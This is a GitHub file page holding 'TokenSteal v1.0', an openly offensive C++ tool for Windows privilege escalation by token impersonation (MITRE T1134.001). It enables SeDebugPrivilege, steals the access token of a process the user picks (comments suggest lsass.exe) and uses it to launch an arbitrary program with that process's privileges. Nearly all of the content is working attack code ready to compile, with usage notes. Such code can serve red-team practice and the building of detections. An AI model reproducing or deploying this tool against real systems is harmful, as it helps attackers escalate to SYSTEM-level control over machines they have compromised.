-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtokensteal.cpp
More file actions
136 lines (77 loc) · 2.69 KB
/
tokensteal.cpp
File metadata and controls
136 lines (77 loc) · 2.69 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
/*
* TokenSteal v1.0 - Windows Privilege Escalation
* Author: X14F7 | 2026-03-07 | T1134.001 (MITRE ATT&CK)
* Usage: ./tokensteal.exe
* [!] Admin + SeDebugPrivilege required
*/
#include <windows.h>
#include <iostream>
using namespace std;
int pid;
HANDLE hprocess;
BOOL hprocesstoken;
HANDLE Token;
BOOL setPriv(LPCWSTR privdeb){
LUID luid;
TOKEN_PRIVILEGES owntokenpriv;
HANDLE owntoken;
if(!LookupPrivilegeValueW(NULL, privdeb, &luid)){
return false;
}
owntokenpriv.PrivilegeCount = 1; //Setting Attributes on our own token
owntokenpriv.Privileges[0].Luid = luid;
owntokenpriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &owntoken)){
return false;
}
if(!AdjustTokenPrivileges(owntoken, FALSE, &owntokenpriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL)){
return false;
}
return true;
}
HANDLE stealToken(int pid){
hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, pid);
if(hprocess == NULL){
cout << "[!] Could not get process handle!" << endl;;
Token = (HANDLE)NULL;
}
hprocesstoken = OpenProcessToken(hprocess, MAXIMUM_ALLOWED, &Token);
if(hprocesstoken == NULL){
cout << "[!] Could not get process token!" << endl;
Token = (HANDLE)NULL;
}
if(Token != NULL){
cout << "[+] Successfully stolen Token!: " << Token << endl;
}
return Token;
}
BOOL createProc(HANDLE Token, LPCWSTR applicationpath){
HANDLE iToken;
STARTUPINFOW SInfo;
PROCESS_INFORMATION PInfo;
ZeroMemory(&SInfo, sizeof(SInfo));
ZeroMemory(&PInfo, sizeof(PInfo));
DuplicateTokenEx(Token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &iToken);
CreateProcessWithTokenW(iToken, LOGON_WITH_PROFILE, (LPCWSTR)applicationpath, NULL, 0, NULL, NULL, &SInfo, &PInfo);
return true;
}
int main(){
cout << "Whats the PID of the Process: "; //Preferably lsass.exe
cin >> pid;
LPCWSTR applicationpath = L"C:\\Windows\\notepad.exe"; //Replace with the path of the application you want to start with higher privilege
if(!setPriv(L"SeDebugPrivilege")){
printf("[!] Could not enable SeDebugPrivilege on desired application");
return -1;
}
Token = stealToken(pid);
if(Token == NULL){
return -1;
}
if(createProc(Token, applicationpath)){
printf("[+] Application set on the desired privilage!");
}
else{
printf("[!] Could not set application on the desired privilage");
return -1;
}
}